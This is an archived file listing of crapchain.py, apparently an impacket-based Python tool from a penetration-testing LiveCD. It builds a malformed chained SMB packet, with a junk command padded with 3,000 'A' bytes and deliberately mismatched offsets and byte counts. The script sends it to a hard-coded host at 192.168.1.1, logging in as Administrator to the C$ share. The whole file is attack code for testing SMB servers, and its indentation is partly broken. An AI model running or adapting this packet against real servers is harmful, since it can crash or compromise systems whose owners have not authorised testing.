home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / usr / bin / crapchain.py < prev    next >
Text File  |  2006-05-22  |  3KB  |  75 lines
  1. from impacket import smb
  2. import os
  3.  
  4. class lotsSMB(smb.SMB):
  5.     def do_lots(self, user, pwd_ansi, share, filename, domain = ''):
  6.     pkt = smb.NewSMBPacket()
  7.     pkt['Flags1']  = 8
  8.     
  9.     sessionSetup = smb.SMBCommand(self.SMB_COM_SESSION_SETUP_ANDX)
  10.     sessionSetup['Parameters'] = smb.SMBSessionSetupAndX_Parameters()
  11.     sessionSetup['Data']       = smb.SMBSessionSetupAndX_Data()
  12.  
  13.     sessionSetup['Parameters']['MaxBuffer']        = 65535
  14.     sessionSetup['Parameters']['MaxMpxCount']      = 2
  15.     sessionSetup['Parameters']['VCNumber']         = os.getpid()
  16.     sessionSetup['Parameters']['SessionKey']       = self.get_session_key()
  17.     sessionSetup['Parameters']['AnsiPwdLength']    = len(pwd_ansi)
  18.     sessionSetup['Parameters']['UnicodePwdLength'] = len('')
  19.     sessionSetup['Parameters']['Capabilities']     = self.CAP_RAW_MODE
  20.  
  21.     sessionSetup['Data']['AnsiPwd']       = pwd_ansi
  22.     sessionSetup['Data']['UnicodePwd']    = ''
  23.     sessionSetup['Data']['Account']       = str(user)
  24.     sessionSetup['Data']['PrimaryDomain'] = str(domain)
  25.     sessionSetup['Data']['NativeOS']      = str(os.name)
  26.     sessionSetup['Data']['NativeLanMan']  = 'pysmb'
  27.  
  28.     # This is an example of how to use chained ANDX commands
  29.     
  30.     treeConnect = smb.SMBCommand(self.SMB_COM_TREE_CONNECT_ANDX)
  31.     treeConnect['Parameters'] = smb.SMBTreeConnectAndX_Parameters()
  32.     treeConnect['Data']       = smb.SMBTreeConnectAndX_Data()
  33.     treeConnect['Parameters']['PasswordLength'] = 1
  34.     treeConnect['Data']['Password'] = '\x00'
  35.     treeConnect['Data']['Path'] = share
  36.     treeConnect['Data']['Service'] = smb.SERVICE_ANY
  37.  
  38.     openFile = smb.SMBCommand(self.SMB_COM_OPEN_ANDX)
  39.     openFile['Parameters'] = smb.SMBOpenAndX_Parameters()
  40.     openFile['Parameters']['DesiredAccess']    = smb.SMB_ACCESS_READ
  41.     openFile['Parameters']['OpenMode']         = smb.SMB_O_OPEN
  42.     openFile['Parameters']['SearchAttributes'] = 0
  43.     openFile['Data']       = smb.SMBOpenAndX_Data()
  44.     openFile['Data']['FileName'] = filename
  45.  
  46.     readAndX = smb.SMBCommand(self.SMB_COM_READ_ANDX)
  47.     readAndX['Parameters'] = smb.SMBReadAndX_Parameters()
  48.     readAndX['Parameters']['Offset'] = 0
  49.     readAndX['Parameters']['Fid'] = 0
  50.     readAndX['Parameters']['MaxCount'] = 4000
  51.  
  52.     crap = smb.SMBCommand(0)
  53.     crap['Parameters'] = smb.SMBAndXCommand_Parameters()
  54.     crap['Data'] = 'A'*3000
  55.  
  56.     pkt.addCommand(sessionSetup)
  57.     pkt.addCommand(crap)
  58.     pkt.addCommand(treeConnect)
  59.     pkt.addCommand(openFile)
  60.     pkt.addCommand(readAndX)
  61.  
  62.         sessionSetup['Parameters']['AndXCommand'] = crap['Parameters']['AndXCommand']
  63.         sessionSetup['Parameters']['AndXOffset']  = crap['Parameters']['AndXOffset']
  64.  
  65.     sessionSetup['ByteCount'] = 1000
  66.     treeConnect['ByteCount'] = 100
  67.  
  68.     self.sendSMB(pkt)
  69.  
  70.     pkt = self.recvSMB()
  71.  
  72. s = lotsSMB('*SMBSERVER','192.168.1.1')
  73. s.do_lots('Administrator','password', r'\\*SMBSERVER\C$', r'\gera')
  74.  
  75.